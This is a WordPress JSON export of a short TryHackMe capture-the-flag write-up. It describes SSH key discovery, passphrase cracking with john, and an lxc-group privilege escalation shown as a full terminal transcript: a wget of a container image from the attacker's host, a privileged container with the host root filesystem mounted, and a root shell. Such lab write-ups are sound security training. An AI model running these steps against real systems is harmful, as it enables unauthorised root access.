{"id":503,"date":"2020-09-23T08:38:14","date_gmt":"2020-09-23T08:38:14","guid":{"rendered":"https:\/\/www.unordnung.net\/?p=503"},"modified":"2020-09-23T08:38:14","modified_gmt":"2020-09-23T08:38:14","slug":"writeup-gamingserver-tryhackme","status":"publish","type":"post","link":"https:\/\/unordnung.net\/misc\/2020\/09\/writeup-gamingserver-tryhackme\/","title":{"rendered":"Writeup GamingServer TryHackMe"},"content":{"rendered":"<p>Running a simple Content discovery with burp, you will find a secret folder with a private ssh key and a corresponding wordlist to crack it. load it to john with 2john and you got its pass. allowing a ssh login with the key as the user, which you&#8217;d found in comments on the site. yes boring. cat user.txt, flag scored.<br \/>\nlooking for priv esc i found the user to be in the lxc group, so we probably can elevated by mounting the root fs as fs in an container, like when you&#8217;re in the docker group with docker. lets see.<br \/>\nyup, as i thought, build an alpine lxc container&#8230;<\/p>\n<pre><small>wget http:\/\/10.9.61.225:8000\/alpine-v3.12-x86_64-20200923_1026.tar.gz\n--2020-09-23 08:31:21--  http:\/\/10.9.61.225:8000\/alpine-v3.12-x86_64-20200923_1026.tar.gz\nConnecting to 10.9.61.225:8000... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 3215528 (3.1M) [application\/gzip]\nSaving to: \u2018alpine-v3.12-x86_64-20200923_1026.tar.gz\u2019\nalpine-v3.12-x86_64-20200923_1026.tar.gz                   100%[=======================================================================================================================================&gt;]   3.07M   791KB\/s    in 4.0s\n2020-09-23 08:31:25 (787 KB\/s) - \u2018alpine-v3.12-x86_64-20200923_1026.tar.gz\u2019 saved [3215528\/3215528]\njohn@exploitable:~$ lxc image import alpine-v3.12-x86_64-20200923_1026.tar.gz --alias alpine\nImage imported with fingerprint: 2ef98380d91867a7d01854e7a03b528e5880e90b30ba80f0dfb5731eb0009c8e\njohn@exploitable:~$ lxc image list\n+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+\n| ALIAS  | FINGERPRINT  | PUBLIC |          DESCRIPTION          |  ARCH  |  SIZE  |         UPLOAD DATE          |\n+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+\n| alpine | 2ef98380d918 | no     | alpine v3.12 (20200923_10:26) | x86_64 | 3.07MB | Sep 23, 2020 at 8:31am (UTC) |\n+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+\njohn@exploitable:~$ lxc init alpine ignite -c security.privileged=true\nCreating ignite\njohn@exploitable:~$ lxc config device add ignite alpine disk source=\/ path=\/mnt\/root\/ recursive=true\nDevice alpine added to ignite\njohn@exploitable:~$ lxc start ignite\njohn@exploitable:~$ lxc exec ignite \/bin\/sh\n~ # id\nuid=0(root) gid=0(root)\n~ # cat \/mnt\/root\/root\/root.txt<\/small><\/pre>\n<p><small><br \/>\n<\/small><small><\/small><br \/>\npwned. ez af \ud83d\ude1b<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Running a simple Content discovery with burp, you will find a secret folder with a private ssh key and a corresponding wordlist to crack it. load it to john with 2john and you got its pass. allowing a ssh login with the key as the user, which you&#8217;d found in comments on the site. yes &#8230; <a title=\"Writeup GamingServer TryHackMe\" class=\"read-more\" href=\"https:\/\/unordnung.net\/misc\/2020\/09\/writeup-gamingserver-tryhackme\/\">Read more<span class=\"screen-reader-text\">Writeup GamingServer TryHackMe<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2,5,4],"tags":[29,74,80],"class_list":["post-503","post","type-post","status-publish","format-standard","hentry","category-blah","category-ctf-writeup","category-to_remember","tag-hacking","tag-tryhackme","tag-writeup"],"_links":{"self":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/503","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/comments?post=503"}],"version-history":[{"count":0,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/posts\/503\/revisions"}],"wp:attachment":[{"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/media?parent=503"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/categories?post=503"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unordnung.net\/misc\/wp-json\/wp\/v2\/tags?post=503"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}